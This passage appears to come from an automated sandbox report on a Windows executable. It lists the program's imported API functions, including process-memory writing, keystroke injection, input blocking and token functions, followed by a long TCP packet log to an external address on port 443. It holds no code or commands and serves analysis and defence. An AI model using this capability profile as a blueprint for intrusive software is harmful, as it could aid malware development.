IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile |
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile |
UxTheme.dll | IsThemeActive |
KERNEL32.dll | WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext |
USER32.dll | GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW |
GDI32.dll | EndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath |
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW |
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW |
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket |
OLEAUT32.dll | VariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | Great Britain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 7, 2024 21:30:02.084697962 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:02.084747076 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:02.084844112 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:02.096025944 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:02.096056938 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:02.862026930 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:02.862095118 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:02.866838932 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:02.866856098 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:02.867249966 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:02.879070044 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:02.923398018 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.431181908 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.431230068 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.431256056 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.431291103 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.431329012 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.431343079 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.431425095 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.433111906 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.433140039 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.433166027 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.433172941 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.433198929 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.433355093 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.538320065 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.538351059 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.538427114 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.538427114 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.538449049 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.538562059 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.541508913 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.541534901 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.541560888 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.541565895 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.541598082 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.541635990 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.544511080 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.544538975 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.544569969 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.544574022 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.544629097 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.544629097 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.547097921 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.547169924 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.547220945 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.547224998 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.547367096 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.683109999 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.683139086 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.686415911 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.686440945 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.686458111 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.686495066 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.686631918 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.688842058 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.688865900 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.688941002 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.688941002 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.688946962 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.690525055 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.690546989 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.690583944 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.690588951 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.690614939 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.693089008 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.693106890 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.693145990 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.693151951 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.693177938 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.694807053 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.694830894 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.694853067 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.694859028 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.695425034 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.741087914 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.812248945 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.812294006 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.812408924 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.812408924 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.812432051 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.815421104 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.837470055 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.837517023 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.837565899 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.837575912 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.837625980 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.837625980 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.839843988 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.839888096 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.839932919 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.839946985 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.839982033 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.841835976 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.841892004 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.841928005 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.841933966 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.841958046 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.843321085 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.843367100 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.843368053 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.843424082 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.843431950 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.843468904 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.844769955 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.844952106 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.845001936 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.845041990 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.845053911 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.845087051 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.846863985 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.846913099 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.846963882 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.846976995 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.847007036 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.848664999 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.848707914 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.848714113 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.848742008 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.848754883 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.848777056 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.850841999 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.867417097 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.868978977 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.898144960 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.898180008 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.898284912 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.898284912 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.898293018 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.898447037 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.922153950 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.922184944 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.922278881 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.922280073 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.922290087 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.923818111 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.923865080 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.923868895 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.923904896 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.923917055 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.923934937 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.924758911 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.925450087 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.925491095 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.925532103 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.925543070 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.925574064 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.927376032 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.927447081 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.927500010 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.927511930 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.927547932 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.928757906 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.944053888 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.944092035 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.944133043 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.944144011 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.944173098 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.944756985 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.946796894 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.946837902 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.946841955 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.946882010 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.946892977 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.946928024 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.948100090 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.948149920 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.948199987 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.948216915 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.948254108 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.952749968 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.982569933 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.982629061 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.982780933 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.982850075 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:03.982894897 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:03.986852884 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.007527113 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.007586956 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.007635117 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.007648945 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.007689953 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.007877111 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.008531094 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.008580923 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.008740902 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.008806944 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.008867025 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.009829044 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.009881973 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.009958029 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.009974003 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
